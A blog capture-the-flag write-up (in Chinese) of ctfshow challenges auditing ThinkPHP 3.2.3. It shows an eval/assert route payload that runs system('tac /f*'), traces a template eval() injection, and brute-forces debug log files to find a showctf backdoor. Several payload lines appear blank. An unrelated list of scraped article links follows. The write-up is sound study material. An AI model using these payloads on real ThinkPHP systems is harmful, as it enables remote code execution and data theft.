Z3r4y
Z3r4y

【Web】Ctfshow Thinkphp3.2.3代码审计(1)

目录

①web569

②web570

③web571

④web572

①web569

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第1张图片

 基础考察

/index.php/Admin/Login/ctfshowLogin

②web570

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第2张图片

提示找路由

查看附件源码 (config.php)

发现定义了一个可执行命令的路由规则

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第3张图片

/index.php/ctfshow/assert/eval($_POST[1])

1=system('tac /f*'); 

③web571

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第4张图片

提示控制器 

查看源码(IndexController.class.php)

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第5张图片

传了参数$n

 

调用了show方法

跟进

调用了display

继续跟

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第6张图片

跟进fetch

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第7张图片

在fetch方法中执行了eval('?>'.$_content);,而$content的值是可控的

payload:

/index.php/home/index/index?n= 

④web572

题目提示要爆破,而且不超过365次 (1年的天数)

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第8张图片

ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关,其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log

bp爆破

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第9张图片

 【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第10张图片

【Web】Ctfshow Thinkphp3.2.3代码审计(1)_第11张图片

访问/Application/Runtime/Logs/Home/21_04_15.log 

得到附件

[ 2021-04-15T14:49:32+08:00 ] 127.0.0.1 /index.php?showctf=%3C?php%20phpinfo();?%3E
INFO: [ app_init ] --START--
INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000039s ]
INFO: [ app_init ] --END-- [ RunTime:0.000738s ]
INFO: [ app_begin ] --START--
INFO: Run Behavior\ReadHtmlCacheBehavior [ RunTime:0.000712s ]
INFO: [ app_begin ] --END-- [ RunTime:0.000868s ]
INFO: [ view_parse ] --START--
INFO: [ template_filter ] --START--
INFO: Run Behavior\ContentReplaceBehavior [ RunTime:0.000071s ]
INFO: [ template_filter ] --END-- [ RunTime:0.000204s ]
INFO: Run Behavior\ParseTemplateBehavior [ RunTime:0.008833s ]
INFO: [ view_parse ] --END-- [ RunTime:0.009135s ]
INFO: [ view_filter ] --START--
INFO: Run Behavior\WriteHtmlCacheBehavior [ RunTime:0.000468s ]
INFO: [ view_filter ] --END-- [ RunTime:0.000591s ]
INFO: [ app_end ] --START--
INFO: Run Behavior\ShowPageTraceBehavior [ RunTime:0.000964s ]
INFO: [ app_end ] --END-- [ RunTime:0.001181s ]

发现任意命令执行后门:/index.php?showctf=

payload:

/index.php?showctf=

你可能感兴趣的:(前端,CTF,WEB,安全,笔记,thinkphp,ctfshow)

  • web页面自适应QWebEngineView的大小 吃面不喝汤66 前端
    #ifndefOPENVIPDIALOG_H#defineOPENVIPDIALOG_H#include#include"draggabledialog.h"#includenamespaceUi{classOpenVipDialog;}classOpenVipDialog:publicDraggableDialog{Q_OBJECTpublic:explicitOpenVipDialog(QWi
  • 1、.Net UI框架:Blazor Hybrid - .Net宣传系列文章 lzhdim ui
    BlazorHybrid是.NET6中引入的一个新特性,它允许开发者使用Blazor技术开发跨平台的桌面和移动应用程序。BlazorHybrid结合了BlazorWebAssembly和BlazorServer的优势,提供了一种在桌面和移动设备上运行Blazor应用的方法。BlazorHybrid的关键特性包括:跨平台应用:可以创建在Windows、macOS、Linux、iOS和Android上
  • 探索Plaid Quickstart:一站式金融数据集成解决方案 杭臣磊Sibley
    探索PlaidQuickstart:一站式金融数据集成解决方案在金融科技领域,快速而安全地获取和处理银行数据至关重要。PlaidQuickstart是一个完美的起点,它是一个开源项目,旨在帮助开发者轻松集成Plaid的API服务,提供多语言支持,以实现与金融机构的数据交互。让我们深入了解这个项目,看看它是如何简化开发流程的。项目介绍PlaidQuickstart提供了一个全面的示例应用程序,涵盖了
  • Android里的设计模式 jim_dayday_up #Android_基础知识设计模式java开发语言
    一:设计模式分类经典的23种设计模式是由ErichGamma、RichardHelm、RalphJohnson和JohnVlissides(合称“GangofFour”)在他们的书《设计模式:可复用面向对象软件的基础》中定义的。以下是这些设计模式的分类和简要介绍。1.1创建型模式单例模式(Singleton):确保一个类只有一个实例,并提供一个全局访问点。抽象工厂模式(AbstractFactor
  • HTML5之基础、元信息标签 Programmer.杨 前端技术-HTMLhtmlmetaheadtitle标签
    标签声明位于文档中最前面的位置,处于标签之前。声明不是一个HTML标签,它是告知Web浏览器该页面使用了哪种HTML版本(规范),浏览器用此版本(规范)对该文档进行解析,渲染。可声明的DTD有三种:分别是严格版本(strict)、过渡版本(transitional)、以及基于框架的版本(frameset),若文档不遵循其DTD规范,则此文档中的代码不但不能通过代码校验,并且有可能无法正常显示。文档
  • MySQL 进阶知识 A_cot mysql数据库前端bigdatadatabase
    当你掌握了基本的SQL语句和数据库操作后,进一步深入了解MySQL的进阶内容,将为你打开更广阔的数据管理和应用之门。一、存储过程与函数1.存储过程存储过程是一组为了完成特定功能的SQL语句集,经编译后存储在数据库中。存储过程可以接收参数、返回结果,并且可以被重复调用。优点:提高性能:存储过程在数据库服务器上执行,减少了网络传输和客户端处理的开销。增强安全性:可以限制对数据库的直接访问,通过存储过程
  • 使用kaptcha验证码框架(代码方式) 念念碎平安夜
    一、编写kaptcha代码@WebServlet("/newCode5")publicclassNewCode5extendsHttpServlet{publicvoiddoGet(HttpServletRequestrequest,HttpServletResponseresponse)throwsServletException,IOException{this.doPost(request,
  • 儿童手表十大品牌排行榜,电话手表什么牌子的好? 高省张导师
    电话手表一般是指儿童电话手表。由于中小学校一般不允许学生带智能手机上学,而智能手机也确实会影响到学生上课的专注度,使用儿童电话手表既方便又安全,还不会干扰学生学习,非常好用。买电话手表上高省领隐藏优惠券,优惠券真的大,佣金真的高,我们真的省!大家好,我是高省APP最大团队,高省APP,是2021年推出的平台,0投资,0风险、高省APP佣金更高,模式更好,终端用户不流失。【高省】是一个可省钱佣金高,
  • 前段存储sessionStorage值localStorage值 ___大鱼___
    对浏览器来说,使用WebStorage存储键值对比存储Cookie方式更直观,而且容量更大,它包含两种:localStorage和sessionStoragesessionStorage(临时存储):为每一个数据源维持一个存储区域,在浏览器打开期间存在,包括页面重新加载localStorage(长期存储):与sessionStorage一样,但是浏览器关闭后,数据依然会一直存在constinfo=
  • 软考笔记--软件系统质量属性 赤露水 软考笔记
    一.软件系统质量属性的概念软件系统的质量就是“软件系统与明确地和隐含的定义的需求相一致的程度”。更具体地说,软件系统质量就是软件与明确地叙述的功能和性能需求文档中明确描述的开发标准以及任何专业开发的软件产品都应该具有的隐含特征相一致的程度。从管理的角度对软件系统质量数据进行度量,可以将影响软件质量的主要因素划分为6种纬度特性:功能性。可靠性,易用性,效率,维护性与可移植性。其中,功能包括适合性,准
  • 《刻意练习》读书笔记 核二10组不忘初心
    二、伦敦司机的大脑如果你喜欢健身,那么你可以通过称体重、测量体脂率或者直接照镜子来观察自己的变化。但如果你想要提高自己某项脑力技能,比如学习一门外语,你能观察到大脑的变化吗?这不太容易。你只能通过一些外在的表现,比如能记住多少单词、能听懂多少听力来判断进度。现在越来越多的研究表明,大脑的结构和运行方式,都会因不同的心理训练而变化。下面我们以一个非常有名的、关于伦敦司机的研究来开始本章节:开车在伦敦
  • 《学会写作》读书笔记4⃣️2⃣️~重新定义处理能力 郭小艳Wendy
    1.识别筛选(1)学会筛选优质信息:筛选优质信息,优先回顾未看完的优质文章,不要从头到尾都看一遍(2)学会识别信息性质:为了更好地吸收(3)学会按需求来筛选:甄别素材,找到适合的、能被自己运用的2.归纳整理:根据实际情况分类,有助于高效处理相关的信息3.提炼总结(1)归纳法:从个性到共性,从特殊到一般的思考方式(2)演绎法:从共性到个性,从一般到特殊的思考方式。
  • 新概念英语3册 lesson7-9补充笔记 多啦A梦的梦想
    Lesson7Mutilatedladies残钞鉴别组【Newwordsandexpressions】生词和短语◆mutilatev.使残缺不全◆chewv.咀嚼◆fiancén.未婚夫◆microwaven.微波,微波炉◆ovenn.炉灶◆safekeepingn.妥善保管◆Newcastlen.纽卡斯尔(英国港市)◆identifyv.鉴别,识别◆spokeswomann.女发言人★mutil
  • 前端进阶:JavaScript实现优雅遮罩层下的表单验证技巧 VaporGas 前端前端javascripthtmlhtml5ecmascript开发语言
    表单验证的高级特性本次介绍的重点如下:动态改变样式属性className属性的用法遮罩层特效的制作动态输入的提示特性实现当文本框获得焦点时改变背景颜色,失去焦点时恢复白色使用元素的style属性访问样式规则object.style.property;例如:访问字体的颜色color使用obj.style.color访问字体的大小属性使用obj.style.fontSizefont-size变换成fo
  • 前端工程化——脚手架及自动化构建 Jelly-JK 前端工程化javascriptnode.jshtml
    定义一切以提高效率、降低成本、质量保证为目的的手段,都属于工程化前端工程化主要解决的问题传统语言或语法的弊端无法使用模块化/组件化重复性的机械工作代码风格统一、质量保证依赖后端服务接口的保证整体依赖后端项目工程化的表现体现在项目的整个流程:创建项目创建项目结构创建特定类型文件编码格式化校验校验代码风格编译/构建/打包预览/测试WebServer/MockLiveReloading/HMRSourc
  • 再度重启日更第3天 旻月
    今日减肥打卡记录初始体重:74.2kg昨日体重:73.5kg今日体重:73.2kg昨日减重:0.3㎏累计减重:1.0kg减重情况,体重变化轻微,可能是年货吃多了,考虑严格控制饮食并增加运动量。学习情况,还是继续整理公考笔记,今日完成时评分析一篇,目前2020年人民时评还剩163篇。本日的小幸运:今天出门拜年吃到的金币巧克力还是原来的味道,没有变。(本地是限制离市拜年,但未禁市内拜年)
  • 明天与意外 ZLL_45f5
    近几天各大媒体都在关注重庆公交车坠江事件,万万没想到竟是乘客和司机的争吵导致了这场灾难,那车上的13人因此离世是何其无辜。新闻说这名女乘客和司机的行为危害了社会公共安全,触犯了刑法,涉嫌犯罪……那么多人都因此离世了,给多个家庭带来了无法言语的伤痛,教训不可谓不惨痛!有时候我在想为什么会出现这样的人祸,活在这个世界已经很艰难了,为什么不能忍忍,让让?显然我是局外人,局中人能有这个觉悟的时候估计都为时
  • 关于电脑卡死如何开机、F8、安全模式 爱蹦跶的精灵 电脑服务器运维
    问题来源和原因亲戚家台式电脑无法开机了原因:游戏、等等等东西太多占用内存,导致系统无法开机比如常见的开机蓝屏,不能正常开机,这个时候我们可以采取通过安全模式启动的办法来启动电脑,从而进一步找到问题并排查故障,以往win7或xp系统电脑开机直接按F8即可win7系统解决:按下开机键,多次点击F8,进入安全模式,删除一些桌面或拖动开机的应用win10系统但是win10这样操作已经不起作用了解决:1、按
  • 使用Electron读取本地文件 ch_s_t 前端开发electronjavascript前端
    Electron原来叫AtomShell,可以用Web技术搭建桌面端程序,以Electron为基础,可以用HTML,CSS和javascriptpt实现程序逻辑和用户桌面,Electron程序一般有主进程和渲染进程,主进程是启动程序的Node脚本,提供对原生的node模块访问。渲染进程是由chromium管理的Web界面。以下的内容介绍从零开始搭建一个读取本地文件的Electron项目。一运行简单
  • Spring Boot 技术提升房屋租赁系统性能 2401_85763803 springboot后端java
    第2章技术介绍2.1相关技术房屋租赁系统是在JSP+MySQL开发环境的基础上开发的。JSP是一种服务器端脚本语言,易于学习,实用且面向用户。全球超过35%的JSP驱动的互联网站点使用JSP。MySQL是一个数据库管理系统,因为它的体积小但速度快,成本低,或者开源受到中小型网站的青睐。因此,JSP+MySQL作为一个成熟的开发环境,可以满足房屋租赁系统设计和开发所需的稳定性,安全性和可扩展性要求。
  • 未来商业战场的轮廓——宁向东线下课笔记 Tonytoni
    关键词:横梯模型+互联网互联网+中间企业互联网模式品牌商信息开放字数:3569,建议阅读时间:10分钟继续来谈宁老师的第二个关键词:未来一、横梯模型第二部分,宁老师分析了未来商业的竞争态势,提出了一个模型:横梯模型。横梯模型横梯的上面,是互联网+,指的互联网平台型企业,包括BAT,google,Facebook等。这是目前正在发生的事情。横梯的下面,是实体制造业,未来将会发生+互联网。制造业的设备
  • [WinError 10013] 以一种访问权限不允许的方式做了一个访问套接字的尝试 lgc0208 服务器网络socket
    在使用Tensorboard的过程中,遇到报错[WinError10013]以一种访问权限不允许的方式做了一个访问套接字的尝试可能原因:当前端口被占用。解决方案:以6006端口为例,首先打开命令行,输入命令:netstat-aon|findstr"6006"查找当前正在占用6006端口的进程PID。查询到对应进程PID后,打开任务管理器,点击详细信息,找到PID对应的进程关闭即可。
  • 女孩 小鹿_6cac
    女孩在中学需要更多的关爱!男孩被女孩碾压小学六年,反之,女孩被男孩碾压中学六年!初高中班级前十名中,女孩大概仅有2--4名,但这几名通常排名靠前,成绩优秀的女孩会特别优秀。不是女孩落后了,是男孩成熟了!男孩凭借体力、脑力和心智,可以赶超女孩了。同理,学校给予不了的,家庭要给到。父母需要理解中学女生,让孩子知道努力的过程最重要,成长的脚步最可贵!女孩需要安全感,父母要和她并肩作战!以上关于关爱男孩女
  • mysql是后端还是前端_MySQL数据库之前端和后端的系统优化 草莓西瓜大桃子 mysql是后端还是前端
    本文中介绍的系统优化,主要针对前端和后台这两方面(后台方面主要对SQL语句和数据存储进行了优化),下文中我们将介绍一些优化技巧和经验。技巧:1.如何查出效率低的语句?在MySQL下,在启动参数中设置--log-slow-queries=[文件名],就可以在指定的日志文件中记录执行时间超过long_query_time(缺省为10秒)的SQL语句。你也可以在启动配置文件中修改longquery的时间
  • python爬虫处理滑块验证_python selenium爬虫滑块验证 用户6731453637 python爬虫处理滑块验证
    importrandomimporttimefromPILimportImagefromioimportBytesIOimportrequestsasrqfrombs4importBeautifulSoupasbsfromseleniumimportwebdriverfromselenium.webdriverimportActionChainsfromselenium.webdriverimpo
  • css 个人喜欢的样式 速查笔记 waterHBO css笔记前端
    起因,目的:记录自己喜欢的,觉得比较好看的css.下次用的时候,直接复制,很方便。1.个人html模板,导入常用的link设置英语字体:Noto导入默认的css使用网络icon图标导入Bootstrapcss框架html-->2.常用css模板todo,以后再增加。*{font-family:"NotoSerif",system-ui;font-optical-sizing:auto;}Noto字
  • Vue解說 白总Server vue.js前端javascript数据库架构网络协议ssl网络
    Vue.js(通常简称为Vue)是一个开源的JavaScript框架,用于构建用户界面和单页应用程序(SPA)。它由前谷歌工程师尤雨溪(EvanYou)创建,并首次发布于2014年。Vue被设计为易于上手、灵活且高效,它允许开发者通过组件化的方式构建复杂的前端应用。Vue.js的关键特点:渐进式框架:Vue可以从简单的界面元素开始,逐步扩展到复杂的单页应用。响应式数据绑定:Vue使用双向数据绑定,
  • 程式语言区分 白总Server htmlpythonjavac++开发语言
    程序语言有很多种,每种都有其特定的用途和特点。以下是一些广泛使用的编程语言:1.Python:易于学习,广泛用于数据科学、机器学习、网络开发、自动化等领域。2.Java:广泛应用于企业级应用、安卓开发、大型系统开发等。3.C:一种基础语言,广泛用于系统编程、嵌入式开发、操作系统等领域。4.C++:C语言的扩展,支持面向对象编程,用于游戏开发、高性能应用等。5.JavaScript:主要用于网页前端
  • java.net.ConnectException: Connection refused`异常的正确解决方法,亲测有效,嘿嘿嘿 代码无疆 Java百宝箱java开发语言
    java.net.ConnectException:Connectionrefused异常通常在尝试建立网络连接时遇到,特别是当客户端试图连接到服务器时,而服务器没有在指定的端口上监听,或者服务器防火墙/安全组规则阻止了连接。以下是对这个异常的详细分析、报错原因、解决思路以及解决方法的说明。问题分析当Java应用程序尝试通过网络套接字(Socket)连接到远程服务器时,如果在目标地址和端口上没有找
  • D019+2组方舟+《吉田医生哈佛求学记》读书笔记 方舟lsy
    今天我阅读了《吉田医生哈佛求学记》第121页—第160页攻破棘手的数学从集中练习“一本书”下手“首先集中一本彻底练习。要学习某种新知识,要开始学习时,投入其中的第一步,如果是书本,就尽可能选择最基本的;如果是思考方法,就选择简介的‘精华部分’,并将其理解透彻”想到自己刚进入付费课程的世界时,心里觉得这些课程哪里都好,都特别想要去上,于是杂七杂八报了很多课,从没有想过自己要些什么,定位在哪里,导致自
  • java短路运算符和逻辑运算符的区别 3213213333332132 java基础
    /* * 逻辑运算符——不论是什么条件都要执行左右两边代码 * 短路运算符——我认为在底层就是利用物理电路的“并联”和“串联”实现的 * 原理很简单,并联电路代表短路或(||),串联电路代表短路与(&&)。 * * 并联电路两个开关只要有一个开关闭合,电路就会通。 * 类似于短路或(||),只要有其中一个为true(开关闭合)是
  • Java异常那些不得不说的事 白糖_ javaexception
    一、在finally块中做数据回收操作 比如数据库连接都是很宝贵的,所以最好在finally中关闭连接。 JDBCAgent jdbc = new JDBCAgent(); try{ jdbc.excute("select * from ctp_log"); }catch(SQLException e){ ... }finally{ jdbc.close();
  • utf-8与utf-8(无BOM)的区别 dcj3sjt126com PHP
    BOM——Byte Order Mark,就是字节序标记   在UCS 编码中有一个叫做"ZERO WIDTH NO-BREAK SPACE"的字符,它的编码是FEFF。而FFFE在UCS中是不存在的字符,所以不应该出现在实际传输中。UCS规范建议我们在传输字节流前,先传输 字符"ZERO WIDTH NO-BREAK SPACE"。这样如
  • JAVA Annotation之定义篇 周凡杨 java注解annotation入门注释
        Annotation: 译为注释或注解 An annotation, in the Java computer programming language, is a form of syntactic metadata that can be added to Java source code. Classes, methods, variables, pa
  • tomcat的多域名、虚拟主机配置 g21121 tomcat
    众所周知apache可以配置多域名和虚拟主机,而且配置起来比较简单,但是项目用到的是tomcat,配来配去总是不成功。查了些资料才总算可以,下面就跟大家分享下经验。 很多朋友搜索的内容基本是告诉我们这么配置: 在Engine标签下增面积Host标签,如下: <Host name="www.site1.com" appBase="webapps"
  • Linux SSH 错误解析(Capistrano 的cap 访问错误 Permission ) 510888780 linuxcapistrano
    1.ssh -v [email protected] 出现 Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password). 错误 运行状况如下: OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 debug1: Reading configuratio
  • log4j的用法 Harry642 javalog4j
    一、前言:     log4j 是一个开放源码项目,是广泛使用的以Java编写的日志记录包。由于log4j出色的表现,     当时在log4j完成时,log4j开发组织曾建议sun在jdk1.4中用log4j取代jdk1.4 的日志工具类,但当时jdk1.4已接近完成,所以sun拒绝使用log4j,当在java开发中
  • mysql、sqlserver、oracle分页,java分页统一接口实现 aijuans oraclejave
    定义:pageStart 起始页,pageEnd 终止页,pageSize页面容量 oracle分页:     select * from ( select mytable.*,rownum num from (实际传的SQL) where rownum<=pageEnd) where num>=pageStart sqlServer分页:  
  • Hessian 简单例子 antlove javaWebservicehessian
    hello.hessian.MyCar.java package hessian.pojo; import java.io.Serializable; public class MyCar implements Serializable { private static final long serialVersionUID = 473690540190845543
  • 数据库对象的同义词和序列 百合不是茶 sql序列同义词ORACLE权限
    回顾简单的数据库权限等命令; 解锁用户和锁定用户 alter user scott account lock/unlock; //system下查看系统中的用户 select * dba_users; //创建用户名和密码 create user wj identified by wj; identified by //授予连接权和建表权 grant connect to
  • 使用Powermock和mockito测试静态方法 bijian1013 持续集成单元测试mockitoPowermock
            实例: package com.bijian.study; import static org.junit.Assert.assertEquals; import java.io.IOException; import org.junit.Before; import org.junit.Test; import or
  • 精通Oracle10编程SQL(6)访问ORACLE bijian1013 oracle数据库plsql
    /* *访问ORACLE */ --检索单行数据 --使用标量变量接收数据 DECLARE v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; BEGIN select ename,sal into v_ename,v_sal from emp where empno=&no; dbms_output.pu
  • 【Nginx四】Nginx作为HTTP负载均衡服务器 bit1129 nginx
     Nginx的另一个常用的功能是作为负载均衡服务器。一个典型的web应用系统,通过负载均衡服务器,可以使得应用有多台后端服务器来响应客户端的请求。一个应用配置多台后端服务器,可以带来很多好处:   负载均衡的好处 增加可用资源 增加吞吐量 加快响应速度,降低延时 出错的重试验机制 Nginx主要支持三种均衡算法: round-robin l
  • jquery-validation备忘 白糖_ jquerycssF#Firebug
    留点学习jquery validation总结的代码:   function checkForm(){ validator = $("#commentForm").validate({// #formId为需要进行验证的表单ID errorElement :"span",// 使用"div"标签标记错误, 默认:&
  • solr限制admin界面访问(端口限制和http授权限制) ronin47 限定Ip访问
    solr的管理界面可以帮助我们做很多事情,但是把solr程序放到公网之后就要限制对admin的访问了。 可以通过tomcat的http基本授权来做限制,也可以通过iptables防火墙来限制。 我们先看如何通过tomcat配置http授权限制。 第一步: 在tomcat的conf/tomcat-users.xml文件中添加管理用户,比如: <userusername="ad
  • 多线程-用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 bylijinnan java多线程
    public class IncDecThread { private int j=10; /* * 题目:用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 * 两个问题: * 1、线程同步--synchronized * 2、线程之间如何共享同一个j变量--内部类 */ public static
  • 买房历程 cfyme
        2015-06-21: 万科未来城,看房子   2015-06-26: 办理贷款手续,贷款73万,贷款利率5.65=5.3675   2015-06-27: 房子首付,签完合同   2015-06-28,央行宣布降息 0.25,就2天的时间差啊,没赶上。   首付,老婆找他的小姐妹接了5万,另外几个朋友借了1-
  • [军事与科技]制造大型太空战舰的前奏 comsci 制造
           天气热了........空调和电扇要准备好..........        最近,世界形势日趋复杂化,战争的阴影开始覆盖全世界..........        所以,我们不得不关
  • dateformat dai_lm DateFormat
    "Symbol Meaning Presentation Ex." "------ ------- ------------ ----" "G era designator (Text) AD" "y year
  • Hadoop如何实现关联计算 datamachine mapreducehadoop关联计算
        选择Hadoop,低成本和高扩展性是主要原因,但但它的开发效率实在无法让人满意。     以关联计算为例。     假设:HDFS上有2个文件,分别是客户信息和订单信息,customerID是它们之间的关联字段。如何进行关联计算,以便将客户名称添加到订单列表中?   &nbs
  • 用户模型中修改用户信息时,密码是如何处理的 dcj3sjt126com yii
    当我添加或修改用户记录的时候对于处理确认密码我遇到了一些麻烦,所有我想分享一下我是怎么处理的。 场景是使用的基本的那些(系统自带),你需要有一个数据表(user)并且表中有一个密码字段(password),它使用 sha1、md5或其他加密方式加密用户密码。 面是它的工作流程: 当创建用户的时候密码需要加密并且保存,但当修改用户记录时如果使用同样的场景我们最终就会把用户加密过的密码再次加密,这
  • 中文 iOS/Mac 开发博客列表 dcj3sjt126com Blog
      本博客列表会不断更新维护,如果有推荐的博客,请到此处提交博客信息。 本博客列表涉及的文章内容支持 定制化Google搜索,特别感谢 JeOam 提供并帮助更新。 本博客列表也提供同步更新的OPML文件(下载OPML文件),可供导入到例如feedly等第三方定阅工具中,特别感谢 lcepy 提供自动转换脚本。这里有导入教程。
  • js去除空格,去除左右两端的空格 蕃薯耀 去除左右两端的空格js去掉所有空格js去除空格
    js去除空格,去除左右两端的空格 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>&g
  • SpringMVC4零配置--web.xml hanqunfeng springmvc4
    servlet3.0+规范后,允许servlet,filter,listener不必声明在web.xml中,而是以硬编码的方式存在,实现容器的零配置。 ServletContainerInitializer:启动容器时负责加载相关配置 package javax.servlet; import java.util.Set; public interface ServletContainer
  • 《开源框架那些事儿21》:巧借力与借巧力 j2eetop 框架UI
    同样做前端UI,为什么有人花了一点力气,就可以做好?而有的人费尽全力,仍然错误百出?我们可以先看看几个故事。 故事1:巧借力,乌鸦也可以吃核桃 有一个盛产核桃的村子,每年秋末冬初,成群的乌鸦总会来到这里,到果园里捡拾那些被果农们遗落的核桃。 核桃仁虽然美味,但是外壳那么坚硬,乌鸦怎么才能吃到呢?原来乌鸦先把核桃叼起,然后飞到高高的树枝上,再将核桃摔下去,核桃落到坚硬的地面上,被撞破了,于是,
  • JQuery EasyUI 验证扩展 可怜的猫 jqueryeasyui验证
      最近项目中用到了前端框架-- EasyUI,在做校验的时候会涉及到很多需要自定义的内容,现把常用的验证方式总结出来,留待后用。   以下内容只需要在公用js中添加即可。   使用类似于如下: <input class="easyui-textbox" name="mobile" id="mobile&
  • 架构师之httpurlconnection----------读取和发送(流读取效率通用类) nannan408
    1.前言.    如题. 2.代码. /* * Copyright (c) 2015, S.F. Express Inc. All rights reserved. */ package com.test.test.test.send; import java.io.IOException; import java.io.InputStream
  • Jquery性能优化 r361251 JavaScriptjquery
    一、注意定义jQuery变量的时候添加var关键字 这个不仅仅是jQuery,所有javascript开发过程中,都需要注意,请一定不要定义成如下: $loading = $('#loading'); //这个是全局定义,不知道哪里位置倒霉引用了相同的变量名,就会郁闷至死的 二、请使用一个var来定义变量 如果你使用多个变量的话,请如下方式定义: . 代码如下: var page
  • 在eclipse项目中使用maven管理依赖 tjj006 eclipsemaven
    概览: 如何导入maven项目至eclipse中 建立自有Maven  Java类库服务器 建立符合maven代码库标准的自定义类库 Maven在管理Java类库方面有巨大的优势,像白衣所说就是非常“环保”。 我们平时用IDE开发都是把所需要的类库一股脑的全丢到项目目录下,然后全部添加到ide的构建路径中,如果用了SVN/CVS,这样会很容易就 把
  • 中国天气网省市级联页面 x125858805 级联
    1、页面及级联js <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> &l
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他